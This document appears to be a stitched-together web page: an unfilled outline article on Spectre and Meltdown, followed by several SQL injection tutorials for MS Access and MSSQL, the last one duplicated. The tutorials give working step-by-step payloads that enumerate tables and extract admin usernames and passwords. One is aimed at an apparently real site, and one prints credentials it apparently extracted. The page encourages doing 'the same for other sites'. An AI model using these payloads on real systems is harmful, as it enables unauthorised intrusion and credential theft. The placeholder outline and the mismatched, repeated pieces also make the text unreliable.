Unveiling the Spectre and Meltdown Vulnerabilities (CVE-2017-5715, CVE-2017-5753, CVE-2017-5754)

 Introduction:

In the realm of cybersecurity, few discoveries have sent shockwaves as profound as Spectre and Meltdown. These vulnerabilities, identified by their Common Vulnerabilities and Exposures (CVE) numbers - CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754 - unearthed critical flaws at the heart of modern computing hardware. This article delves into the intricacies of these vulnerabilities, their potential consequences, and the far-reaching impact they've had on the technology landscape.

Section 1: What are Spectre and Meltdown? Spectre and Meltdown represent a class of vulnerabilities that exploit speculative execution in modern microprocessors, affecting a wide range of CPUs from various manufacturers. Speculative execution is a performance-enhancing feature that allows processors to execute instructions before it's certain they're needed. This vulnerability allowed attackers to access sensitive data stored in memory, including passwords, encryption keys, and personal information.

Section 2: The Discovery and Disclosure

• Describe the researchers and teams that uncovered Spectre and Meltdown.
• Discuss the responsible disclosure process and the challenges in coordinating with hardware and software vendors.

Section 3: The Technical Details

• Explain the technical intricacies of each vulnerability (CVE-2017-5715, CVE-2017-5753, CVE-2017-5754).
• Describe how speculative execution works and how attackers exploited it to leak sensitive data.

Section 4: The Widespread Impact

• Detail the wide range of CPUs affected by Spectre and Meltdown.
• Discuss the potential consequences, including data breaches, identity theft, and corporate espionage.

Section 5: Mitigation and Countermeasures

• Explain how hardware and software vendors responded to these vulnerabilities.
• Discuss the challenges of patching hardware-level vulnerabilities and the performance implications of mitigations.

Section 6: Real-world Exploitation

• Provide examples of real-world incidents or attacks that leveraged Spectre and Meltdown.
• Discuss the evolving threat landscape and how attackers adapted to these vulnerabilities.

Section 7: Industry Response and Collaboration

• Highlight the collaborative efforts among hardware manufacturers, software developers, and security researchers.
• Discuss the long-term changes in CPU design and security practices.

Section 8: Lessons Learned

• Analyze the lessons learned from Spectre and Meltdown.
• Emphasize the importance of hardware security and the need for ongoing vulnerability assessment.

Section 9: The Future of Hardware Security

• Discuss how Spectre and Meltdown have shaped the future of CPU and hardware security.
• Mention ongoing research and developments in the field.

Conclusion: Spectre and Meltdown have forever altered the landscape of hardware security. These vulnerabilities, while alarming, have prompted the tech industry to reevaluate and strengthen its approach to security at the hardware level. As we continue to rely on increasingly powerful processors, the lessons learned from Spectre and Meltdown serve as a reminder that security must remain a top priority in the ever-evolving world of technology.

MS-Access Injection - Tutorial - Penetration Testing | Bug Bounty Program

 In this Tutorial You Will learn How to inject into MS Access Database.

So we will start Our Injecting Manually. First we have to check if Our Target site is Vulnerable. So we

will use Regular Injecting Type and add Single Quote ' at the end of the Parameter.

and Execute the URL

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'

Here we got The ERROR ! !

ERROR:

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'ID =341''.

/dettaglio-news.asp, line 91

So Our Target is Vulnerable. Before Starting Other Process first we have To balance

our query. We will use Different Comments for balancing Our Query.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error !

ERROR:Syntax error (missing operator) in query expression 'ID =341--'.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again Error !!

Now Let's Check the null-byte " ;% 00 "

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Error Gone!!

so will continue our Injecting with using Null-Byte at the end of the Parameter.

Now we have to Count the Total number of Columns. So For This Purpose we will

use Normally ORDER BY command.

Let's Check Total Number of Columns:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;% 00

No Error. Page Loaded Normally !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;% 00

Again No Error !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;% 00

Again page Loaded Normally !

but at order by 9 we have got the ERROR !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;% 00

ERROR:

Microsoft JET Database Engine error '80040e14'

The Microsoft Jet database engine does not recognize '9' as a valid field name or

expression.

/dettaglio-news.asp, line 91

So There are 8 Columns .

Now Let's Prepare our UNION BASED command.

After Executing The UNION BASED query We have Got ERROR:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;%

00

 

ERROR:

Microsoft JET Database Engine error '80004005'

Query input must contain at least one table or query.

/dettaglio-news.asp, line 91

Here Comes The Main part.As our columns count is correct.so it seems to be

Database is mysql 4.

Now we Have to Guess the Tables and Columns.So First we will Guess the Tables.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from Login;% 00

it gives us ERROR!

ERROR:

Microsoft JET Database Engine error '80040e37'

The Microsoft Jet database engine cannot find the input table or query 'login'. Make

sure it exists and that its name is spelled correctly.

/dettaglio-news.asp, line 91

it Mean this table is not Exist. Let’s Try another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from tabladmin;% 00

Still The Same ERROR!!

But when we try Table ADMIN the Error is Gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from admin;% 00

At the Table ADMIN the Error is gone and we can see the Vulnerable Columns on

the Web Page .

You can see the 2,3,6 are the Vulnerable Columns.so now we have to Guess the

Columns. We will put our columns in these Vulnerable Columns.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,admin_id,4,5,6,7,8 from admin;% 00

It Gives us Error !

ERROR:

Microsoft JET Database Engine error '80040e10'

No value given for one or more required parameters.

/dettaglio-news.asp, line 91

it Mean ,this Column is not existing. Let's Try Another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,login_id,4,5,6,7,8 from admin;% 00

Still The Same Error !

When we Put Username Column the Error is Gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,username,4,5,6,7,8 from admin;% 00

So it gives us Username:01775IO5

Now Let's Guess column of Admin Password.

And the Column Password is also existing there.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,password,4,5,6,7,8 from admin;% 00

it Gives us Password="bEx0Th6

So we will do the same for other sites to injecting into database.

MSSQL Injection Using Convert - Penetration Testing - Bug Bounty Program

 In our Previous Tutorial We Have Discuss About Union Based Injection

Now Let's Come to the Next Part. In this Tutorial You Will Learn About Injecting Site

with Convert Attack. How Actually This Command Work. This command works

between two Data types and we have to give Commands to the Server with Convert

then it will give That Specific Data which we have execute in the Command.

So let's start our injection Manually.

we got A target and let's Check if it's Vulnerable for injecting. So we will Execute the

URL by Adding Single Quote " ' "at the End If the Target Parameter.

http://www.Vuln-Site.com/authorprofile.asp?id=46'

It Gives us Error

ERROR:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the

character string ''.

/authorprofile.asp, line 10

Our Target site is Vulnerable. As we Are Injecting with Convert Attack So we no need

to Go For Counting the Total number Of Columns. We will Directly Execute our

Commands with Convert.

Let's Check The Version.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--

After Executing the Query We Got The Version.

Here is Version:Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15

Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64>

(Build 7601: Service Pack 1)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015

18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT

6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.

/authorprofile.asp, line 10

Now Let's check The Current Database name.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())—

And we Have got The Current Database Name.

This is Current Database Name:museindia

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'museindia' to data type int.

/authorprofile.asp, line 10

As we have get the Version and The Database name. Now Let's move to Getting The

Tables.

This is Our Query for getting the Tables.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

table_name from information_schema.tables))--+

After Executing the Query we have Got The First Table Name.

Table name:about

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'about' to data type int.

/authorprofile.asp, line 10

For Getting the Other Tables from the Database we will add our Previous Table name

Enclosed By Single Quotes with in Small Brackets.

For Example:

and 1=convert(int,(select top 1 table_name from information_schema.tables where

table_name not in

('OUR_PREVIOUS_TABLE_NAME_1','OUR_PREVIOUS_TABLE_NAME_2')))--+

So Let's Check The Other Tables from the Database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

table_name from information_schema.tables where table_name not in ('about')))--+

And We Have got The Next Table Name

Next Table Name:aucon

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'aucon' to data type int.

/authorprofile.asp, line 10

In this Way we will Continue to Getting Other tables until get Required Table.

Here we Got The Table name: members

Now let's Get the Column names from this Table.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='members'))--+

we have got the First Column name.

This is the First Column Name: memberid

Let's try to get the other Columns as we do the same for getting the other

tables from the database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='members' and

column_name not in ('memberid')))--+

So After Getting the Column name The Final Part is To Extracting Data from The

Columns.

This will be Our Final Query !

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top

1OUR_COLUMN_NAME _HERE from OUR_TABLE_NAME_HERE))--+

This query will Print the Data from the Columns on the Webpage.

 MSSQL Union Based Injection Part-2 - Advanced Method

In This Tutorial You Will Learn Some Advanced Method that will help you in Injecting.

In Normal Sites We Do order by and Count Columns Then Prepare UNION BASED

command for Finding Vulnerable Columns but in some Cases We are stuck on

UNION BASED. So for This Tutorial i have Find site for Practice.

First we Will Check the Vulnerability, so we will Usually Add Single Quote ‘at the End

of the Parameter.

http://www.genuinecomputers.in/products.asp?pro=PenDrives'

After Executing The URL it Gives us Error !

As our Target is Vulnerable so Let's our injecting Manually.First Let's check how many

Columns are there. So We will use ORDER BY Command For Counting The Columns.

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1--+

No ERROR !!

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 100---+

Again No Error !!

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1000---+

Still No Error !!

Let's try String Based Injection.so we will Add Single Quote After the parameter. But

If You have Notice the ERROR RESPONSE it automatically Adding Closed bracket

" ) " in our injection . So We will Add String with Closed Bracket " ) " after the

Parameter.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 1---+

No Error !! Site Loaded Normally .

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 6---+

Again No Error !!

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 7---+

Here we have got a ERROR !!

ERROR:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 7 is

out of range of the number of items in the select list.

/products.asp, line 131

So There are 6 Total Number of Columns. Now Let's Prepare Our UNION BASED

Command for Finding the Vulnerable Columns.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') union select

1,2,3,4,5,6---+

But Here we Got Error !

ERROR:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the varchar value 'PenDrives' to data type int.

/products.asp, line 131

Although Our Column Count is Correct .The Problem is With The Numbered Values

.So to Bypass this Error Let's add Null Values instead of Numbers and Then Execute

our UNION BASED Query.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') and 1=2 union

select null,null,null,null,null,null---+

Bingooo :p ERROR BYPASSED !!

but we cannot see the Vulnerable columns. So We will check every Column One by

One. First let's check the Version. We will Add @@version in the 1st Column then

again replace it to null and go to the next one.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

@@version,null,null,null,null,null--+

Here we got the Version.

Version:

Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) Oct 19 2012 13:38:57 Copyright

(c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.2 <X64> (Build

9200: )

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) Oct 19 2012

13:38:57 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT

6.2 <X64> (Build 9200: ) ' to data type smallint.

/products.asp, line 131

Now Let's Check the Tables from the current Database.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

table_name,null,null,null,null,null from information_Schema.tables--+

Here we got table name

As this is The First Table Name Let's Check the Next one. For Finding the other tables

we will add this Part in our Query.

where table_name not in ('PREVIOUS_TABLE_1','PREVIOUS_TABLE_2')

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

table_name,null,null,null,null,null from information_Schema.tables where table_name

not in ('products')--+

After getting the Tables next we will check the Columns.so we will use this Query for

Getting the Columns from the Table.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

column_name,null,null,null,null,null from information_Schema.columns where

table_name='OUR_TABLE_NAME_HERE'--+

As we have got the First Column. So Checking The Other Columns we will add this

Part in Our Query.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select

column_name,null,null,null,null,null from information_Schema.columns where

table_name='OUR_TABLE_NAME_HERE' where column_name not in

('PREVIOUS_COLUMN_1','PREVIOUS_COLUMN_2')--+

So After Getting The Table and the Columns Final Part is To Extracting Data from the

Columns.

So This is The Final Query .

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union

selectOUR_COLUMN_HERE,null,null,null,null,null from OUR_TABLE_HERE--+

 MSSQL Union Based Injection

In MySQL Database. Now Let's Come to injecting MSSQL Database.

In this Tutorial We Will Discuss About MSSQL Union Based injection. Although

MSSQL injection is Similar to MySQL but Not the Same as MySQL Is Easy than

MSSQL Injection.

So Let's Start Our injecting.

We have a Target site. First we Have to Check if It's Vulnerable to MSSQL injection or

not. For This Purpose, we Will add single Quote (') at the end of the Parameter.

Here Let us Say Our Target site is and Add Single Quote ' at the End to check the

Vulnerability:

http://www.AnySite.com/news.asp?id=10'

After executing The Command with single Quote It Gives This Type of Error:

ERROR:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ''.

/news.asp, line 9

So it Mean Our Target Site is Vulnerable to MSSQL injection.

Next we Have to Balance Our Query. Here are Some Comments that we Can Apply

on our Target Site:

http://www.AnySite.com/news.asp?id=10-- Loading Fine !

http://www.AnySite.com/news.asp?id=10--+ Loading Fine !

http://www.AnySite.com/news.asp?id=10%23 Loading Fine !

http://www.AnySite.com/news.asp?id=10; Loading Fine !

So as You know That Each Site Has Different WAF so use there Different Comments

for Balancing The Query.After balancing The Query now Next we Have to Count

Columns. So we Will Normally use ORDER BY command For counting Columns

Purpose.

http://www.AnySite.com/news.asp?id=10 order by 1--+ Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 5--+ Again Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 15--+ Again Site Loaded Normally

and there is no any kind of error !

http://www.AnySite.com/news.asp?id=10 order by 16--+ Here we have Got Error !!

Error:

Microsoft OLE DB Provider for SQL Server error '80040e14'

The ORDER BY position number 16 is out of range of the number of items in the

select list.

/news.asp, line 9

So It Means There are 15 Total Columns. Now Let's Prepare Our UNION BASED

Command. For Finding the Vulnerable Columns we have to False the URL.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

After Executing the UNION BASED command you can see the Vulnerable Columns

Printed on the Webpage.

in my case 5,6,7,8,9 are vulnerable Columns there.

So Now Let's Check the Version. for Finding the Version we will use @@version. We

cannot use Version() here As it Is MSSQL Database Not MySQL Database.

Let's Give Command For Checking The Version:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+

After Executing the Query you can See the Version Printed on The Webpage:

Version:

Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46

Copyright (c) Microsoft Corporation Express Edition with Advanced Services (64-bit)

on Windows NT 6.2 (Build 9200:) (Hypervisor)

Now Let's Check the Current Database Name. so for this we will Give command

db_name() in the Vulnerable Column.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,db_name(),6,7,8,9,10,11,12,13,14,15--+

and after executing this Command you can see the Database Name Printed Out

there .

Database Name:

bietdb

Here Are some other Functions and There Uses:

USES                                     :                                         FUCTION

@@version                                                                 Current Version

db_name()                             :                             Current Database name

System_user                          :                                 Current User name

User_name()                          :                                 Current User name

current_user()                        :                                  Current User name

Now Next Part Is to get the Tables from the Database. As We cannot use

group_concat Here Therefore We Have to Get the Tables One by One. So this one

Will Be Our Query for Getting the Tables.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--+

And You Can See the First Table Name Printed There.

So Admin is the First Table Name Here. But If you want to Get the Other Tables then

use this One Query.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where

table_name not in ('admin')--+

In this admin we will add our Previous Table name to get the Next one. We Will

Continue to do so until Get the table That We Want.

Remember That every Table Name must be in small brackets and being enclosed by

Single Quotes as You Can See This one query.

where table_name not in ('Previous_Table_name_1','Previous_Table_name_2')

So Let's Execute This Query for Getting other Tables in the Database.

so Here is our Second Table in the Database.

Now Let's Get the Columns from the Tables. So this one Will be our Query for the

Columns.

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT

1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns

where table_name=('admin')--+

After Executing this Query, you can see The First Column name.

This is First Column in that Table. Let’s Get the Other Columns from that Table. So for

This Purpose we will use This Query.

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT

1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns

where table_name=('admin') and columns_name not in ('emp_name')--+

in The RED Part we have to add Previous Column Name to Get the Next one as we

Done This for Getting the TABLES. SO You Can Do it until You get that column name

which you want.

So Let's Execute this Query to Get the other Columns.

You can see the Next Column Name Printed there.

As We Have Get the Columns Name Now Let's Extract data from them. As we Cannot

use group_concat in MSSQL so Will Use + Encoded Value with Single Quotes. So

Our Final Query for Extracting Data From The Columns will be:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT

1,2,3,4,user_name%2b' '%2buser_pass,6,7,8,9,10,11,12,13,14,15 from admin--+

And After Executing the Query you can see the username and Password Printed in

the above Picture.

You can do the Same Procedure for Extracting Data from other columns.

MSSQL Union Based Injection

In MySQL Database. Now Let's Come to injecting MSSQL Database.

In this Tutorial We Will Discuss About MSSQL Union Based injection. Although MSSQL injection is Similar to MySQL Not the Same as MySQL Is Easy than MSSQL Injection.

So Let's Start Our injecting.

We have a Target site. First, we Have to Check if It's Vulnerable to MSSQL injection or

not. For This Purpose, we Will add a single Quote (') at the end of the Parameter.

Here Let us Say Our Target site is and Add Single Quote ' at the End to check the

Vulnerability:

http://www.AnySite.com/news.asp?id=10'

After executing The Command with a single Quote It Gives This Type of Error:

ERROR:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ''.

/news.asp, line 9

So it Means Our Target Site is Vulnerable to MSSQL injection.

Next, we Have to Balance Our Query. Here Are Some Comments that we Can Apply

on our Target Site:

http://www.AnySite.com/news.asp?id=10-- Loading Fine!

http://www.AnySite.com/news.asp?id=10--+ Loading Fine !

http://www.AnySite.com/news.asp?id=10%23 Loading Fine !

http://www.AnySite.com/news.asp?id=10; Loading Fine !

So as You know That Each Site Has a Different WAF so use their Different Comments

for Balancing The Query. After balancing The Query now Next we Have to Count Columns. So we Will Normally use the ORDER BY command For counting Columns

Purpose.

http://www.AnySite.com/news.asp?id=10 order by 1--+ Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 5--+ Again Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 15--+ 

Again Site Loaded Normally and there is no kind of error!

http://www.AnySite.com/news.asp?id=10 order by 16--+ 

Here we have Got an Error !!

Error:

Microsoft OLE DB Provider for SQL Server error '80040e14'

The ORDER BY position number 16 is out of range of the number of items in the

select list.

/news.asp, line 9

So It Means There are 15 Total Columns. Now Let's Prepare Our UNION BASED

Command. For Finding the Vulnerable Columns we have to False the URL.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

After Executing the UNION BASED command you can see the Vulnerable Columns

Printed on the Webpage.

in my case 5,6,7,8,9 are vulnerable Columns there.

So Now Let's Check the Version. for Finding the Version we will use @@version. 

We cannot use Version() here As it Is MSSQL Database Not MySQL Database.

Let's Give Command For Checking The Version:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+

After Executing the Query you can See the Version Printed on The Webpage:

Version:

Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46

Copyright (c) Microsoft Corporation Express Edition with Advanced Services (64-bit)

on Windows NT 6.2 (Build 9200:) (Hypervisor)

Now Let's Check the Current Database Name. so for this, we will give the command

db_name() in the Vulnerable Column.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT

1,2,3,4,db_name(),6,7,8,9,10,11,12,13,14,15--+

and after executing this command you can see the Database Name Printed Out there.

 

Database Name:

bietdb

Here Are some other Functions and There Uses:

USES : FUCTION

@@version Current Version

db_name() : Current Database name

System_user : Current User name

User_name() : Current User name

current_user() : Current User name

Now Next Part Is to get the Tables from the Database. As We cannot use

group_concat Here Therefore We Have to Get the Tables One by One. So this one

Will Be Our Query for Getting the Tables.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--+

And You Can See the First Table Name Printed There.

So Admin is the First Table Name Here. But If you want to Get the Other Tables then

use this One Query.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name not in ('admin')--+

In this admin, we will add our Previous Table name to get the Next one. We, Will, continue to do so until Get the table That We Want. Remember That every Table Name must be in small brackets and being enclosed by

Single Quotes as You Can See This one query.

where table_name not in ('Previous_Table_name_1','Previous_Table_name_2')

So Let's Execute This Query for Getting other Tables in the Database.

so Here is our Second Table in the Database.

Now Let's Get the Columns from the Tables. So this one Will be our Query for the

Columns.

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin')--+

After Executing this Query, you can see The First Column name.

This is First Column in that Table. Let’s Get the Other Columns from that Table. So for

For this purpose, we will use This Query.

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin') and columns_name not in ('emp_name')--+

in The RED Part, we have to add the Previous Column Name to Get the Next one as we are Done with This for Getting the TABLES. SO You Can Do it until You get that column name that you want. So Let's Execute this Query to Get the other Columns. You can see the Next Column Name Printed there.

As We Have to Get the Columns Name Now Let's Extract data from them. As we Cannot use group_concat in MSSQL so Will Use + Encoded Value with Single Quotes. So Our Final Query for Extracting Data From The Columns will be:

http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,user_name%2b' '%2buser_pass,6,7,8,9,10,11,12,13,14,15 from admin--+

And After Executing the Query you can see the username and Password Printed in the above Picture. You can do the Same Procedure for Extracting Data from other columns.